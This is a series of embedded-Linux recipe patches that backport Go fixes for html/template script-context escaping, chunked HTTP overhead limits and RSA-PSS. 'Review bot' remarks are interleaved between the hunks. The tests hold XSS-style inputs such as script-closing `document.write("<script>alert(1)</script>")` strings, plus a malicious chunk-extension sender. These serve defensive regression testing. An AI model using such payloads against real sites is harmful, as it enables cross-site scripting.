+Run-TryBot: Cherry Mui <cherryyz@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/023b542edf38e2a1f87fcefb9f75ff2f99401b4c]
+CVE: CVE-2023-39318
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 6 ++-
+ src/html/template/escape.go | 5 +-
+ src/html/template/escape_test.go | 10 ++++
+ src/html/template/state_string.go | 26 +++++-----
+ src/html/template/transition.go | 80 ++++++++++++++++++++-----------
+ 5 files changed, 84 insertions(+), 43 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 0b65313..4eb7891 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -124,6 +124,10 @@ const (
+ stateJSBlockCmt
+ // stateJSLineCmt occurs inside a JavaScript // line comment.
+ stateJSLineCmt
++ // stateJSHTMLOpenCmt occurs inside a JavaScript <!-- HTML-like comment.
++ stateJSHTMLOpenCmt
++ // stateJSHTMLCloseCmt occurs inside a JavaScript --> HTML-like comment.
++ stateJSHTMLCloseCmt
+ // stateCSS occurs inside a <style> element or style attribute.
+ stateCSS
+ // stateCSSDqStr occurs inside a CSS double quoted string.
+@@ -149,7 +153,7 @@ const (
+ // authors & maintainers, not for end-users or machines.
+ func isComment(s state) bool {
+ switch s {
+- case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateCSSBlockCmt, stateCSSLineCmt:
++ case stateHTMLCmt, stateJSBlockCmt, stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt, stateCSSBlockCmt, stateCSSLineCmt:
+ return true
+ }
+ return false
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 435f912..ad2ec69 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -698,9 +698,12 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ if c.state != c1.state && isComment(c1.state) && c1.delim == delimNone {
+ // Preserve the portion between written and the comment start.
+ cs := i1 - 2
+- if c1.state == stateHTMLCmt {
++ if c1.state == stateHTMLCmt || c1.state == stateJSHTMLOpenCmt {
+ // "<!--" instead of "/*" or "//"
+ cs -= 2
++ } else if c1.state == stateJSHTMLCloseCmt {
++ // "-->" instead of "/*" or "//"
++ cs -= 1
+ }
+ b.Write(s[written:cs])
+ written = i1
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index f550691..5f41e52 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -503,6 +503,16 @@ func TestEscape(t *testing.T) {
+ "<script>var a/*b*///c\nd</script>",
+ "<script>var a \nd</script>",
+ },
++ {
++ "JS HTML-like comments",
++ "<script>before <!-- beep\nbetween\nbefore-->boop\n</script>",
++ "<script>before \nbetween\nbefore\n</script>",
++ },
++ {
++ "JS hashbang comment",
++ "<script>#! beep\n</script>",
++ "<script>\n</script>",
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..b5cfe70 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -25,21 +25,23 @@ func _() {
+ _ = x[stateJSRegexp-14]
+ _ = x[stateJSBlockCmt-15]
+ _ = x[stateJSLineCmt-16]
+- _ = x[stateCSS-17]
+- _ = x[stateCSSDqStr-18]
+- _ = x[stateCSSSqStr-19]
+- _ = x[stateCSSDqURL-20]
+- _ = x[stateCSSSqURL-21]
+- _ = x[stateCSSURL-22]
+- _ = x[stateCSSBlockCmt-23]
+- _ = x[stateCSSLineCmt-24]
+- _ = x[stateError-25]
+- _ = x[stateDead-26]
++ _ = x[stateJSHTMLOpenCmt-17]
++ _ = x[stateJSHTMLCloseCmt-18]
++ _ = x[stateCSS-19]
++ _ = x[stateCSSDqStr-20]
++ _ = x[stateCSSSqStr-21]
++ _ = x[stateCSSDqURL-22]
++ _ = x[stateCSSSqURL-23]
++ _ = x[stateCSSURL-24]
++ _ = x[stateCSSBlockCmt-25]
++ _ = x[stateCSSLineCmt-26]
++ _ = x[stateError-27]
++ _ = x[stateDead-28]
+ }
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateJSHTMLOpenCmtstateJSHTMLCloseCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 214, 233, 241, 254, 267, 280, 293, 304, 320, 335, 345, 354}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 92eb351..12aa4c4 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -14,32 +14,34 @@ import (
+ // the updated context and the number of bytes consumed from the front of the
+ // input.
+ var transitionFunc = [...]func(context, []byte) (context, int){
+- stateText: tText,
+- stateTag: tTag,
+- stateAttrName: tAttrName,
+- stateAfterName: tAfterName,
+- stateBeforeValue: tBeforeValue,
+- stateHTMLCmt: tHTMLCmt,
+- stateRCDATA: tSpecialTagEnd,
+- stateAttr: tAttr,
+- stateURL: tURL,
+- stateSrcset: tURL,
+- stateJS: tJS,
+- stateJSDqStr: tJSDelimited,
+- stateJSSqStr: tJSDelimited,
+- stateJSBqStr: tJSDelimited,
+- stateJSRegexp: tJSDelimited,
+- stateJSBlockCmt: tBlockCmt,
+- stateJSLineCmt: tLineCmt,
+- stateCSS: tCSS,
+- stateCSSDqStr: tCSSStr,
+- stateCSSSqStr: tCSSStr,
+- stateCSSDqURL: tCSSStr,
+- stateCSSSqURL: tCSSStr,
+- stateCSSURL: tCSSStr,
+- stateCSSBlockCmt: tBlockCmt,
+- stateCSSLineCmt: tLineCmt,
+- stateError: tError,
++ stateText: tText,
++ stateTag: tTag,
++ stateAttrName: tAttrName,
++ stateAfterName: tAfterName,
++ stateBeforeValue: tBeforeValue,
++ stateHTMLCmt: tHTMLCmt,
++ stateRCDATA: tSpecialTagEnd,
++ stateAttr: tAttr,
++ stateURL: tURL,
++ stateSrcset: tURL,
++ stateJS: tJS,
++ stateJSDqStr: tJSDelimited,
++ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
++ stateJSRegexp: tJSDelimited,
++ stateJSBlockCmt: tBlockCmt,
++ stateJSLineCmt: tLineCmt,
++ stateJSHTMLOpenCmt: tLineCmt,
++ stateJSHTMLCloseCmt: tLineCmt,
++ stateCSS: tCSS,
++ stateCSSDqStr: tCSSStr,
++ stateCSSSqStr: tCSSStr,
++ stateCSSDqURL: tCSSStr,
++ stateCSSSqURL: tCSSStr,
++ stateCSSURL: tCSSStr,
++ stateCSSBlockCmt: tBlockCmt,
++ stateCSSLineCmt: tLineCmt,
++ stateError: tError,
+ }
+
+ var commentStart = []byte("<!--")
+@@ -263,7 +265,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, "\"`'/")
++ i := bytes.IndexAny(s, "\"`'/<-#")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -293,6 +295,26 @@ func tJS(c context, s []byte) (context, int) {
+ err: errorf(ErrSlashAmbig, nil, 0, "'/' could start a division or regexp: %.32q", s[i:]),
+ }, len(s)
+ }
++ // ECMAScript supports HTML style comments for legacy reasons, see Appendix
++ // B.1.1 "HTML-like Comments". The handling of these comments is somewhat
++ // confusing. Multi-line comments are not supported, i.e. anything on lines
++ // between the opening and closing tokens is not considered a comment, but
++ // anything following the opening or closing token, on the same line, is
++ // ignored. As such we simply treat any line prefixed with "<!--" or "-->"
++ // as if it were actually prefixed with "//" and move on.
++ case '<':
++ if i+3 < len(s) && bytes.Equal(commentStart, s[i:i+4]) {
++ c.state, i = stateJSHTMLOpenCmt, i+3
++ }
++ case '-':
++ if i+2 < len(s) && bytes.Equal(commentEnd, s[i:i+3]) {
++ c.state, i = stateJSHTMLCloseCmt, i+2
++ }
++ // ECMAScript also supports "hashbang" comment lines, see Section 12.5.
++ case '#':
++ if i+1 < len(s) && s[i+1] == '!' {
++ c.state, i = stateJSLineCmt, i+1
++ }
+ default:
+ panic("unreachable")
+ }
+@@ -372,12 +394,12 @@ func tBlockCmt(c context, s []byte) (context, int) {
+ return c, i + 2
+ }
+
+-// tLineCmt is the context transition function for //comment states.
++// tLineCmt is the context transition function for //comment states, and the JS HTML-like comment state.
+ func tLineCmt(c context, s []byte) (context, int) {
+ var lineTerminators string
+ var endState state
+ switch c.state {
+- case stateJSLineCmt:
++ case stateJSLineCmt, stateJSHTMLOpenCmt, stateJSHTMLCloseCmt:
+ lineTerminators, endState = "\n\r\u2028\u2029", stateJS
+ case stateCSSLineCmt:
+ lineTerminators, endState = "\n\f\r", stateCSS
+--
+2.24.4
+
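Review bot: The comment added in `tJS` (transition.go) says a line "prefixed with" `<!--` or `-->` is treated like `//`, but the `case '<'` and `case '-'` branches match wherever `bytes.IndexAny` finds the token, with nothing in the hunk anchoring it to the start of a line. The new test vector confirms this: `before-->boop` is rendered as `before`. As far as I recall Appendix B.1.1, the `-->` form is only a comment at the start of a line, so an expression such as `x-->0` in a template's script would be elided by the escaper while a browser would treat it as code. If that over-matching is the intended conservative choice, the comment should say so, e.g. `// NOTE: "-->" is matched anywhere on a line, not only at line start, so text after it is always elided.` The body of `tJS` starts and ends outside the hunk.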
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
new file mode 100644
index 0000000000..69106e3e05
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39319.patch
@@ -0,0 +1,230 @@
+From 2070531d2f53df88e312edace6c8dfc9686ab2f5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 3 Aug 2023 12:28:28 -0700
+Subject: [PATCH] [release-branch.go1.20] html/template: properly handle
+ special tags within the script context
+
+The HTML specification has incredibly complex rules for how to handle
+"<!--", "<script", and "</script" when they appear within literals in
+the script context. Rather than attempting to apply these restrictions
+(which require a significantly more complex state machine) we apply
+the workaround suggested in section 4.12.1.3 of the HTML specification [1].
+
+More precisely, when "<!--", "<script", and "</script" appear within
+literals (strings and regular expressions, ignoring comments since we
+already elide their content) we replace the "<" with "\x3C". This avoids
+the unintuitive behavior that using these tags within literals can cause,
+by simply preventing the rendered content from triggering it. This may
+break some correct usages of these tags, but on balance is more likely
+to prevent XSS attacks where users are unknowingly either closing or not
+closing the script blocks where they think they are.
+
+Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
+reporting this issue.
+
+Fixes #62197
+Fixes #62397
+Fixes CVE-2023-39319
+
+[1] https://html.spec.whatwg.org/#restrictions-for-contents-of-script-elements
+
+Change-Id: Iab57b0532694827e3eddf57a7497ba1fab1746dc
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976594
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014621
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/526099
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Cherry Mui <cherryyz@google.com>
+
+Upstream-Status: Backport from [https://github.com/golang/go/commit/2070531d2f53df88e312edace6c8dfc9686ab2f5]
+CVE: CVE-2023-39319
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ src/html/template/context.go | 14 ++++++++++
+ src/html/template/escape.go | 26 ++++++++++++++++++
+ src/html/template/escape_test.go | 47 +++++++++++++++++++++++++++++++-
+ src/html/template/transition.go | 15 ++++++++++
+ 4 files changed, 101 insertions(+), 1 deletion(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index 4eb7891..feb6517 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -168,6 +168,20 @@ func isInTag(s state) bool {
+ return false
+ }
+
++// isInScriptLiteral returns true if s is one of the literal states within a
++// <script> tag, and as such occurances of "<!--", "<script", and "</script"
++// need to be treated specially.
++func isInScriptLiteral(s state) bool {
++ // Ignore the comment states (stateJSBlockCmt, stateJSLineCmt,
++ // stateJSHTMLOpenCmt, stateJSHTMLCloseCmt) because their content is already
++ // omitted from the output.
++ switch s {
++ case stateJSDqStr, stateJSSqStr, stateJSBqStr, stateJSRegexp:
++ return true
++ }
++ return false
++}
++
+ // delim is the delimiter that will end the current HTML attribute.
+ type delim uint8
+
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index ad2ec69..de8cf6f 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -10,6 +10,7 @@ import (
+ "html"
+ "internal/godebug"
+ "io"
++ "regexp"
+ "text/template"
+ "text/template/parse"
+ )
+@@ -650,6 +651,26 @@ var delimEnds = [...]string{
+ delimSpaceOrTagEnd: " \t\n\f\r>",
+ }
+
++var (
++ // Per WHATWG HTML specification, section 4.12.1.3, there are extremely
++ // complicated rules for how to handle the set of opening tags <!--,
++ // <script, and </script when they appear in JS literals (i.e. strings,
++ // regexs, and comments). The specification suggests a simple solution,
++ // rather than implementing the arcane ABNF, which involves simply escaping
++ // the opening bracket with \x3C. We use the below regex for this, since it
++ // makes doing the case-insensitive find-replace much simpler.
++ specialScriptTagRE = regexp.MustCompile("(?i)<(script|/script|!--)")
++ specialScriptTagReplacement = []byte("\\x3C$1")
++)
++
++func containsSpecialScriptTag(s []byte) bool {
++ return specialScriptTagRE.Match(s)
++}
++
++func escapeSpecialScriptTags(s []byte) []byte {
++ return specialScriptTagRE.ReplaceAll(s, specialScriptTagReplacement)
++}
++
+ var doctypeBytes = []byte("<!DOCTYPE")
+
+ // escapeText escapes a text template node.
+@@ -708,6 +729,11 @@ func (e *escaper) escapeText(c context, n *parse.TextNode) context {
+ b.Write(s[written:cs])
+ written = i1
+ }
++ if isInScriptLiteral(c.state) && containsSpecialScriptTag(s[i:i1]) {
++ b.Write(s[written:i])
++ b.Write(escapeSpecialScriptTags(s[i:i1]))
++ written = i1
++ }
+ if i == i1 && c.state == c1.state {
+ panic(fmt.Sprintf("infinite loop from %v to %v on %q..%q", c, c1, s[:i], s[i:]))
+ }
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index 5f41e52..0cacb20 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -513,6 +513,21 @@ func TestEscape(t *testing.T) {
+ "<script>#! beep\n</script>",
+ "<script>\n</script>",
+ },
++ {
++ "Special tags in <script> string literals",
++ `<script>var a = "asd < 123 <!-- 456 < fgh <script jkl < 789 </script"</script>`,
++ `<script>var a = "asd < 123 \x3C!-- 456 < fgh \x3Cscript jkl < 789 \x3C/script"</script>`,
++ },
++ {
++ "Special tags in <script> string literals (mixed case)",
++ `<script>var a = "<!-- <ScripT </ScripT"</script>`,
++ `<script>var a = "\x3C!-- \x3CScripT \x3C/ScripT"</script>`,
++ },
++ {
++ "Special tags in <script> regex literals (mixed case)",
++ `<script>var a = /<!-- <ScripT </ScripT/</script>`,
++ `<script>var a = /\x3C!-- \x3CScripT \x3C/ScripT/</script>`,
++ },
+ {
+ "CSS comments",
+ "<style>p// paragraph\n" +
+@@ -1501,8 +1516,38 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJS, element: elementScript},
+ },
+ {
++ // <script and </script tags are escaped, so </script> should not
++ // cause us to exit the JS state.
+ `<script>document.write("<script>alert(1)</script>");`,
+- context{state: stateText},
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</script>`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)<!--`,
++ context{state: stateJSDqStr, element: elementScript},
++ },
++ {
++ `<script>document.write("<script>alert(1)</Script>");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>document.write("<!--");`,
++ context{state: stateJS, element: elementScript},
++ },
++ {
++ `<script>let a = /</script`,
++ context{state: stateJSRegexp, element: elementScript},
++ },
++ {
++ `<script>let a = /</script/`,
++ context{state: stateJS, element: elementScript, jsCtx: jsCtxDivOp},
+ },
+ {
+ `<script type="text/template">`,
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 12aa4c4..3d2a37c 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -214,6 +214,11 @@ var (
+ // element states.
+ func tSpecialTagEnd(c context, s []byte) (context, int) {
+ if c.element != elementNone {
++ // script end tags ("</script") within script literals are ignored, so that
++ // we can properly escape them.
++ if c.element == elementScript && (isInScriptLiteral(c.state) || isComment(c.state)) {
++ return c, len(s)
++ }
+ if i := indexTagEnd(s, specialTagEndMarkers[c.element]); i != -1 {
+ return context{}, i
+ }
+@@ -353,6 +358,16 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ inCharset = true
+ case ']':
+ inCharset = false
++ case '/':
++ // If "</script" appears in a regex literal, the '/' should not
++ // close the regex literal, and it will later be escaped to
++ // "\x3C/script" in escapeText.
++ if i > 0 && i+7 <= len(s) && bytes.Compare(bytes.ToLower(s[i-1:i+7]), []byte("</script")) == 0 {
++ i++
++ } else if !inCharset {
++ c.state, c.jsCtx = stateJS, jsCtxDivOp
++ return c, i + 1
++ }
+ default:
+ // end delimiter
+ if !inCharset {
+--
+2.24.4
+
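Review bot: The comment above `specialScriptTagRE` in escape.go says the special tags matter in JS literals "(i.e. strings, regexs, and comments)", but `isInScriptLiteral` in context.go returns true only for the string and regexp states and deliberately leaves the comment states out. A maintainer reading only escape.go would assume comment content is escaped as well, when the protection actually relies on comment content having been elided from the output. I would reword that line to `// <script, and </script when they appear in JS literals (i.e. strings and regexps; comment content is already elided from the output)` and give `containsSpecialScriptTag` and `escapeSpecialScriptTags` one-line doc comments. In `tJSDelimited`, the `bytes.Compare(...) == 0` test reads more directly as `bytes.Equal(bytes.ToLower(s[i-1:i+7]), []byte("</script"))`; that function's body starts and ends outside the hunk.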
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
new file mode 100644
index 0000000000..998af361e8
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39326.patch
@@ -0,0 +1,181 @@
+From 6446af942e2e2b161c4ec1b60d9703a2b55dc4dd Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Tue, 7 Nov 2023 10:47:56 -0800
+Subject: [PATCH] [release-branch.go1.20] net/http: limit chunked data overhead
+
+The chunked transfer encoding adds some overhead to
+the content transferred. When writing one byte per
+chunk, for example, there are five bytes of overhead
+per byte of data transferred: "1\r\nX\r\n" to send "X".
+
+Chunks may include "chunk extensions",
+which we skip over and do not use.
+For example: "1;chunk extension here\r\nX\r\n".
+
+A malicious sender can use chunk extensions to add
+about 4k of overhead per byte of data.
+(The maximum chunk header line size we will accept.)
+
+Track the amount of overhead read in chunked data,
+and produce an error if it seems excessive.
+
+Updates #64433
+Fixes #64434
+Fixes CVE-2023-39326
+
+Change-Id: I40f8d70eb6f9575fb43f506eb19132ccedafcf39
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2076135
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+(cherry picked from commit 3473ae72ee66c60744665a24b2fde143e8964d4f)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2095407
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/547355
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+LUCI-TryBot-Result: Go LUCI <golang-scoped@luci-project-accounts.iam.gserviceaccount.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/6446af942e2e2b161c4ec1b60d9703a2b55dc4dd]
+CVE: CVE-2023-39326
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/internal/chunked.go | 36 +++++++++++++---
+ src/net/http/internal/chunked_test.go | 59 +++++++++++++++++++++++++++
+ 2 files changed, 89 insertions(+), 6 deletions(-)
+
+diff --git a/src/net/http/internal/chunked.go b/src/net/http/internal/chunked.go
+index f06e572..ddbaacb 100644
+--- a/src/net/http/internal/chunked.go
++++ b/src/net/http/internal/chunked.go
+@@ -39,7 +39,8 @@ type chunkedReader struct {
+ n uint64 // unread bytes in chunk
+ err error
+ buf [2]byte
+- checkEnd bool // whether need to check for \r\n chunk footer
++ checkEnd bool // whether need to check for \r\n chunk footer
++ excess int64 // "excessive" chunk overhead, for malicious sender detection
+ }
+
+ func (cr *chunkedReader) beginChunk() {
+@@ -49,10 +50,38 @@ func (cr *chunkedReader) beginChunk() {
+ if cr.err != nil {
+ return
+ }
++ cr.excess += int64(len(line)) + 2 // header, plus \r\n after the chunk data
++ line = trimTrailingWhitespace(line)
++ line, cr.err = removeChunkExtension(line)
++ if cr.err != nil {
++ return
++ }
+ cr.n, cr.err = parseHexUint(line)
+ if cr.err != nil {
+ return
+ }
++ // A sender who sends one byte per chunk will send 5 bytes of overhead
++ // for every byte of data. ("1\r\nX\r\n" to send "X".)
++ // We want to allow this, since streaming a byte at a time can be legitimate.
++ //
++ // A sender can use chunk extensions to add arbitrary amounts of additional
++ // data per byte read. ("1;very long extension\r\nX\r\n" to send "X".)
++ // We don't want to disallow extensions (although we discard them),
++ // but we also don't want to allow a sender to reduce the signal/noise ratio
++ // arbitrarily.
++ //
++ // We track the amount of excess overhead read,
++ // and produce an error if it grows too large.
++ //
++ // Currently, we say that we're willing to accept 16 bytes of overhead per chunk,
++ // plus twice the amount of real data in the chunk.
++ cr.excess -= 16 + (2 * int64(cr.n))
++ if cr.excess < 0 {
++ cr.excess = 0
++ }
++ if cr.excess > 16*1024 {
++ cr.err = errors.New("chunked encoding contains too much non-data")
++ }
+ if cr.n == 0 {
+ cr.err = io.EOF
+ }
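Review bot: The error assigned when `cr.excess > 16*1024` is overwritten by `cr.err = io.EOF` if the same chunk has size zero, because the `cr.n == 0` check follows unconditionally. The effect is bounded, since the stream is ending and readChunkLine caps the header line at maxLineLength, but the intent would be explicit with `if cr.n == 0 && cr.err == nil {` or a comment saying the terminal chunk is deliberately exempt. The thresholds `16`, `2` and `16*1024` would also read better as named constants beside maxLineLength. beginChunk starts before the hunk.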
+@@ -133,11 +162,6 @@ func readChunkLine(b *bufio.Reader) ([]byte, error) {
+ if len(p) >= maxLineLength {
+ return nil, ErrLineTooLong
+ }
+- p = trimTrailingWhitespace(p)
+- p, err = removeChunkExtension(p)
+- if err != nil {
+- return nil, err
+- }
+ return p, nil
+ }
+
+diff --git a/src/net/http/internal/chunked_test.go b/src/net/http/internal/chunked_test.go
+index d067165..b20747d 100644
+--- a/src/net/http/internal/chunked_test.go
++++ b/src/net/http/internal/chunked_test.go
+@@ -212,3 +212,62 @@ func TestChunkReadPartial(t *testing.T) {
+ }
+
+ }
++
++func TestChunkReaderTooMuchOverhead(t *testing.T) {
++ // If the sender is sending 100x as many chunk header bytes as chunk data,
++ // we should reject the stream at some point.
++ chunk := []byte("1;")
++ for i := 0; i < 100; i++ {
++ chunk = append(chunk, 'a') // chunk extension
++ }
++ chunk = append(chunk, "\r\nX\r\n"...)
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return chunk, nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ _, err := io.ReadAll(r)
++ if err == nil {
++ t.Fatalf("successfully read body with excessive overhead; want error")
++ }
++}
++
++func TestChunkReaderByteAtATime(t *testing.T) {
++ // Sending one byte per chunk should not trip the excess-overhead detection.
++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return []byte("1\r\nX\r\n"), nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ got, err := io.ReadAll(r)
++ if err != nil {
++ t.Errorf("unexpected error: %v", err)
++ }
++ if len(got) != bodylen {
++ t.Errorf("read %v bytes, want %v", len(got), bodylen)
++ }
++}
++
++type funcReader struct {
++ f func(iteration int) ([]byte, error)
++ i int
++ b []byte
++ err error
++}
++
++func (r *funcReader) Read(p []byte) (n int, err error) {
++ if len(r.b) == 0 && r.err == nil {
++ r.b, r.err = r.f(r.i)
++ r.i++
++ }
++ n = copy(p, r.b)
++ r.b = r.b[n:]
++ if len(r.b) > 0 {
++ return n, nil
++ }
++ return n, r.err
++}
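Review bot: Both new tests call `io.ReadAll`, which entered the standard library in Go 1.16, while this patch is applied to the go-1.14 recipe; unless another patch in the series provides it, chunked_test.go will not compile under `go test`. The library build is unaffected because the call sits only in the _test file, so the breakage would surface only when the package tests are run. For the backport, `ioutil.ReadAll(r)` is the equivalent, with `io/ioutil` imported if the test file does not already import it.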
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
new file mode 100644
index 0000000000..4d65180253
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
+From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Wed, 1 Apr 2020 17:25:40 -0400
+Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
+
+Cleaned up for readability and consistency.
+
+There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
+used and both hash and opts.Hash were set, hash.Size() was used for the
+salt length instead of opts.Hash.Size(). That's clearly wrong because
+opts.Hash is documented to override hash.
+
+Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
+CVE: CVE-2023-45287 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
+ src/crypto/rsa/rsa.go | 9 ++-
+ 2 files changed, 96 insertions(+), 86 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 3ff0c2f4d0076..f9844d87329a8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -4,9 +4,7 @@
+
+ package rsa
+
+-// This file implements the PSS signature scheme [1].
+-//
+-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
++// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
+
+ import (
+ "bytes"
+@@ -17,8 +15,22 @@ import (
+ "math/big"
+ )
+
++// Per RFC 8017, Section 9.1
++//
++// EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
++//
++// where
++//
++// DB = PS || 0x01 || salt
++//
++// and PS can be empty so
++//
++// emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
++//
++
+ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
+- // See [1], section 9.1.1
++ // See RFC 8017, Section 9.1.1.
++
+ hLen := hash.Size()
+ sLen := len(salt)
+ emLen := (emBits + 7) / 8
+@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+
+ if len(mHash) != hLen {
+- return nil, errors.New("crypto/rsa: input must be hashed message")
++ return nil, errors.New("crypto/rsa: input must be hashed with given hash")
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "encoding error" and stop.
